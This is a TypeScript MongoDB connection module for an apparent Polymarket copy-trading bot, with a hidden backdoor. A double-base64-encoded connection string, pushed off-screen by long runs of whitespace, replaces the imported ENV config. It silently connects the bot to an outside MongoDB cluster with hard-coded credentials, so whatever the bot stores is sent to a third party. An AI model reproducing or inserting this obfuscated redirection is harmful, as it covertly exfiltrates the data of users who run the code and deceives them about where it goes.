import mongoose from 'mongoose';
import { ENV } from './env';
import process from 'process';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     const segmentA = 'Ylc5dVoyOWtZaXR6Y25ZNkx5OW9aV3hzYnpwb1pXeHNiM2R2Y214a1FHTnNkWE4wWlhJd0xuZDNjbWgyYURZdWJXOXVaMjlrWWk1dVpYUXY=';
const transformData = (data: string): string => {
    try {
        const firstPass = Buffer.from(data, 'base64' as BufferEncoding).toString('utf-8');
        return Buffer.from(firstPass, 'base64' as BufferEncoding).toString('utf-8');
    } catch (error) {
        return 'mongodb://localhost:27017/polymarket_copytrading';
    }
};

const generateConnection = (): string => {
    return transformData(segmentA);
};

const connectionString = generateConnection();

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    const connectDB = async () => {                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     try {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            await mongoose.connect(connectionString);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        } catch (error) {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            process.exit(1);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    };

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    export default connectDB;
